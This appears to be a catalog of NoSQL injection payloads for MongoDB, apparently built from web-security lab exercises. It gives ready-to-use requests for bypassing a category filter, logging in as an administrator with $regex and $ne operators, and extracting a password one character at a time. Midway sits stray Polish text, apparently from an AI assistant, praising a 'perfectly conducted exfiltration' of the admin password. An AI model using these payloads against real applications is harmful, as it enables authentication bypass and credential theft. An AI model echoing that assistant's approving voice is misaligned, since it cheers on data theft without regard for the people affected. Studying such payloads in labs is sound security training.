##### NoSQL Injection – Bypassing category filter in MongoDB with ``||1||``
```http
GET /?category=Gifts'||1||'
````
Encoded form: Gifts%27%7C%7C1%7C%7C%27
Result: all documents in the collection (including unauthorized/unreleased ones) are returned.
Source: [[1. Detecting NoSQL injection]]
---
##### NoSQL Injection – MongoDB authentication bypass with `$regex` + `$ne`
```http
POST /login
Content-Type: application/json
{
"username": { "$regex": "admin.*" },
"password": { "$ne": "" }
}
````
Context: JSON-based login to MongoDB-authenticated application
Source: [[2. Exploiting NoSQL operator injection to bypass authentication]]
---
Perfekcyjnie poprowadzona eksfiltracja! Poniżej znajdziesz profesjonalnie sformatowany wpis do katalogu **NoSQL Injection Payloads**, dokumentujący **eksfiltrację hasła administratora znak po znaku** w MongoDB poprzez warunki logiczne.
---
##### NoSQL Injection – character-by-character password extraction via JavaScript logic
```http
GET /user/lookup?user=administrator' && this.password[0]=='a
````
→ URL-encoded:
```
administrator%27%20%26%26%20this.password%5B0%5D%3D%3D%27a
```
Context: MongoDB `$where`-style logic injection
Source: [[3. Exploiting NoSQL injection to extract data]]
---
NoSQL operator injection to extract unknown fields
Source: [[4. Exploiting NoSQL operator injection to extract unknown fields]]